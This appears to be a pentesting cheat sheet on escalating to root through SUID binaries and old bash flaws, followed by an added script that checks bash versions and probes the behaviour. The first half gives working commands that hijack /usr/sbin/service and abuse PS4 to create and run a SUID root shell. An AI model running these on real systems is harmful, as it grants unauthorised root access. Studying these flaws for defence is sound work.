Binary
Inspect the SUID binary itself: which shared libraries it loads and which strings it embeds. Hard-coded paths and commands found this way are what the two bash tricks below hook into.
ldd /usr/local/bin/node
strings /usr/local/bin/node
Bug in bash < 4.2-048
In Bash versions < 4.2-048 a shell function can be given a name that looks like an absolute path (for example /usr/sbin/service) and exported with export -f; a child bash that imports it from the environment then runs the function instead of the real executable whenever a command uses that path.
/bin/bash --version
function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service
If a SUID binary runs, for example, /usr/sbin/service apache2 start through a shell that imports our exported function, the function body executes in place of the real service binary; /bin/bash -p keeps the effective (privileged) UID instead of dropping it.
Bash versions < 4.4
When in debugging mode (xtrace), Bash uses the environment variable PS4 to display an extra prompt for debugging statements, and PS4 undergoes command substitution each time it is printed. Since both SHELLOPTS and PS4 are read from the environment at startup, a bash spawned by a SUID program executes whatever command PS4 contains. From 4.4 onward bash ignores SHELLOPTS and PS4 inherited from the environment when its effective UID differs from its real UID, which is why the version cut-off applies.
Run the /usr/local/bin/suid-env2 executable with bash debugging enabled and the PS4 variable set to an embedded command which creates an SUID version of /bin/bash:
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
The copy was made by the SUID process, so /tmp/rootbash is root-owned with the SUID bit set. Run it with -p so bash keeps the effective UID instead of dropping it, giving a shell running with root privileges:
/tmp/rootbash -p
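Both version checks above (exported functions below 4.2-048, PS4 through SHELLOPTS below 4.4) come down to the same question: does the bash that the SUID program spawns trust attacker-controlled environment? The script below is an added example, not code from the original page or from any of the tools it mentions. It classifies a bash --version banner against exactly the two cut-offs quoted above and, as an ordinary user, probes the local bash for the two behaviours. The function names, the marker path /tmp/probe-hijack (used only as a function name, nothing is written there) and the sample version strings are my own assumptions for the example.

```shell
#!/bin/sh
# Added example, not part of the original page. Written in POSIX sh on purpose:
# the parent shell stays neutral and the two probes spawn bash explicitly.

# parse_bash_version STRING -> "MAJOR MINOR PATCH" (exit 1 if no x.y.z is found).
# Accepts the full `bash --version` banner or a bare "4.2.45". Patch level 48 of
# the 4.2 series ("4.2-048" in the text above) reports itself as 4.2.48.
parse_bash_version() {
    printf '%s\n' "$1" |
        sed -n 's/^[^0-9]*\([0-9][0-9]*\)\.\([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2 \3/p' |
        grep .
}

# classify_bash_version STRING -> which trick the version is exposed to, using
# only the cut-offs quoted on this page:
#   func-export  below 4.2-048 (slash-named functions imported from the environment)
#   ps4-xtrace   below 4.4 (SHELLOPTS/PS4 taken from the environment by a setuid bash)
# Prints "none" past both cut-offs and "unknown" if the string does not parse.
# Other series (4.3.x and older) received their own patches for the function
# import issue, so for anything that is not 4.2.x trust probe_function_import
# below rather than this table.
classify_bash_version() {
    parsed=$(parse_bash_version "$1") || { echo unknown; return 1; }
    set -- $parsed          # word-split "MAJOR MINOR PATCH" into $1 $2 $3
    major=$1 minor=$2 patch=$3
    out=
    if [ "$major" -lt 4 ] || { [ "$major" -eq 4 ] && [ "$minor" -lt 2 ]; } \
       || { [ "$major" -eq 4 ] && [ "$minor" -eq 2 ] && [ "$patch" -lt 48 ]; }; then
        out="func-export"
    fi
    if [ "$major" -lt 4 ] || { [ "$major" -eq 4 ] && [ "$minor" -lt 4 ]; }; then
        out="${out:+$out }ps4-xtrace"
    fi
    echo "${out:-none}"
}

# probe_function_import -> "imported" or "not-imported"
# Defines a function whose name is a path, exports it, and asks a child bash to
# run that path. A bash that still imports slash-named functions from the
# environment runs the function instead of looking for a file (the page's
# /usr/sbin/service trick). Runs as the current user; /tmp/probe-hijack is only
# a hypothetical name, nothing is created there, and a fixed bash just fails to
# find the file.
probe_function_import() {
    bash -c '
        function /tmp/probe-hijack { echo HIJACKED; }
        export -f /tmp/probe-hijack
        bash -c /tmp/probe-hijack
    ' 2>/dev/null | grep -q HIJACKED && echo imported || echo not-imported
}

# probe_ps4_xtrace -> "executed" or "not-executed"
# Starts bash with an empty environment except SHELLOPTS=xtrace and a PS4 whose
# command substitution prints a marker; bash expands PS4 before every traced
# command, so the marker shows up on the trace output. Any bash does this for a
# normal user; what 4.4 changed is only the setuid case (EUID != UID), so an
# unprivileged probe shows the mechanism the page relies on but cannot tell a
# vulnerable SUID bash from a fixed one.
probe_ps4_xtrace() {
    bashbin=$(command -v bash) || { echo not-executed; return; }
    env -i SHELLOPTS=xtrace PS4='$(echo PS4-EXECUTED)' "$bashbin" -c ':' 2>&1 |
        grep -q PS4-EXECUTED && echo executed || echo not-executed
}

# Report for the bash actually installed on this box (nothing is written or escalated).
report() {
    banner=$(bash --version 2>/dev/null | head -n 1)
    echo "bash:              ${banner:-not found}"
    echo "version cut-offs:  $(classify_bash_version "$banner")"
    echo "function import:   $(probe_function_import)"
    echo "PS4 via SHELLOPTS: $(probe_ps4_xtrace)"
}
report
```

The version table is a first filter only; the function-import probe is the authoritative check for that trick, and the PS4 probe confirms the mechanism but not the setuid behaviour, which can only be observed against a real SUID program that spawns bash.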